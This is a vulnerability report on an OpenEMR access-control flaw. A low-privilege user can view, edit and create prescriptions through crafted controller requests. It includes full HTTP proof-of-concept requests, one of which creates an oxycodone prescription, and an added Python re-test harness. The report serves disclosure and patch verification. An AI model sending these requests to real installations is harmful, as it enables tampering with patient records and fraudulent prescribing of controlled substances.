Access Control Vulnerability in Prescription Controller in openemr/openemr
Reported on
Mar 13th 2023
Description
An access-control vulnerability in the prescription controller allows a low-privilege user of the web application (for example a receptionist) to view, create, and edit prescriptions for any patient.
Proof of Concept
Step 1. Log in to the OpenEMR web application as a low-privilege user (e.g. the Receptionist account in the OpenEMR demo).
Step 2. Navigate to any page that makes your browser send a new request, for example Patient->New/Search, and capture that request with an intercepting proxy such as Burp Suite.
Step 3. Modify the request line (method and path) to one of the following:
GET /a/openemr/controller.php?prescription&edit&id=17 (Edits the existing prescription whose id is given by the id parameter)
POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 (Creates a new prescription for the patient whose id is given by the pid parameter)
GET /a/openemr/controller.php?prescription&list&id=2 (Lists the existing prescriptions for the patient whose id is given by the id parameter)
For this PoC we use POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 to create a new prescription for the patient with pid=1. Below is the altered request:
POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.openemr.io/a/openemr/interface/main/tabs/main.php?token_main=3sY8M8OnnLfIk423mJEzQPDv3CH9dHifsjryleJC
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Step 4. This request returns the 'Add/Edit' page for a new prescription. Fill in the required fields, click Save, and capture the resulting request with Burp Suite. Note: ACL restrictions prevent the drug-search widget on this page from working, but the drug name can simply be supplied by appending &drug=nameofdrug to the request body. Below is the modified request:
POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/a/openemr/interface/new/new.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
controlled_substance_flag=on&active=1&start_date=2023-03-13&provider_id=1&patient_id=1&rxcui_select=on&quantity=100&size=25&unit=1&dosage=1&form=2&route=0&interval=0&refills=3&per_refill=100&note=&substitute=0&id=0&process=true&rxnorm_drugcode=&drug=oxycodone
Step 5. After sending this modified request, the response shows the list of all prescriptions for that patient, including the newly created one. Log in to an admin account and open the patient with the tested pid to confirm that the prescription was stored.
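To re-test this after upgrading (for example to 7.0.1), the following Python harness, added here and not part of the original report or the OpenEMR code base, builds the three controller requests from the steps above and classifies each response as granted or denied. The refusal-page wording, the sample responses and the form values are constructed assumptions; plug in a real HTTP client carrying the low-privilege session cookie to run it against an installation.

```python
"""
Offline harness for re-testing the OpenEMR prescription-controller access
control described in the steps above.  Added example: not code from the
original report or from the OpenEMR project.  Assumptions are marked.
"""
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlencode

Response = Tuple[int, str]           # (HTTP status, response body)
Transport = Callable[["Probe"], Response]


@dataclass(frozen=True)
class Probe:
    name: str
    method: str
    path: str
    body: Optional[str] = None       # urlencoded form for POST, None for GET


def build_probes(base_path: str, pid: int, rx_id: int) -> list:
    """The three controller requests quoted in the report, for one patient
    (pid) and one existing prescription (rx_id).  A low-privilege session
    should be refused all of them."""
    # Minimal save form for the create case.  Field names follow the captured
    # request in Step 4; the values are constructed for this example.
    # 'drug' is supplied directly because the drug-search widget is ACL-gated.
    new_rx = {
        "active": "1",
        "start_date": "2023-03-13",
        "provider_id": "1",
        "patient_id": str(pid),
        "quantity": "1",
        "refills": "0",
        "note": "",
        "id": "0",
        "process": "true",
        "drug": "placebo",
    }
    ctl = f"{base_path}/controller.php?prescription"
    return [
        Probe("edit-existing", "GET", f"{ctl}&edit&id={rx_id}"),
        Probe("list", "GET", f"{ctl}&list&id={pid}"),
        Probe("create", "POST", f"{ctl}&edit&id=0&pid={pid}", urlencode(new_rx)),
    ]


# Markers used to classify a response.  ASSUMPTION: the exact wording of
# OpenEMR's refusal page is not given in the report; adjust for your version.
DENIED_MARKERS = ("not authorized", "access denied")
GRANTED_MARKERS = ("prescription",)


def classify(status: int, html: str) -> str:
    """Return 'denied', 'granted' or 'unknown' for one response."""
    text = html.lower()
    if status in (401, 403) or any(m in text for m in DENIED_MARKERS):
        return "denied"
    if status == 200 and any(m in text for m in GRANTED_MARKERS):
        return "granted"
    return "unknown"


def run(probes, transport: Transport) -> Dict[str, str]:
    """Send every probe through `transport` and classify each result."""
    return {p.name: classify(*transport(p)) for p in probes}


def is_vulnerable(results: Dict[str, str]) -> bool:
    """Any probe that was granted means the ACL check is missing."""
    return any(v == "granted" for v in results.values())


# Constructed responses standing in for a live server, so the harness runs
# offline.  Replace `fake_transport` with a real HTTP client (sending the
# low-privilege session cookie) to test an installation.
UNPATCHED = {
    "edit-existing": (200, "<h2>Add/Edit Prescription</h2><form>...</form>"),
    "list": (200, "<table><tr><td>Prescription list</td></tr></table>"),
    "create": (200, "<table><tr><td>Prescription list</td></tr></table>"),
}
PATCHED = {name: (200, "<p>Not Authorized</p>") for name in UNPATCHED}


def fake_transport(pages: Dict[str, Response]) -> Transport:
    """Transport that answers each probe from a prepared page table."""
    return lambda probe: pages[probe.name]


if __name__ == "__main__":
    probes = build_probes("/a/openemr", pid=1, rx_id=17)
    for label, pages in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        res = run(probes, fake_transport(pages))
        print(label, res, "VULNERABLE" if is_vulnerable(res) else "ok")
```

A verdict of "unknown" for any probe means the response matched neither marker set; inspect it by hand rather than treating it as a pass, since a redirect to the login page or a blank response would also land there.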
Impact
A malicious actor with access to a low-privilege account in the web application could view, create, and edit prescriptions for any patient. Because prescriptions are controlled and legally restricted records, this is a high-risk weakness.
A preliminary fix has been posted in commit 81832acc14207e577e76c4175967c99ae7e3d3f4
Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.1), which will likely be in about 2-3 weeks. After that's completed we will be ok to make CVE # and make it public.
Thanks!
Could you please mark this vulnerability as Valid.
thanks @drew-sec
Now that 7.0.1 has been released, can we please have the CVE filled for this vulnerability?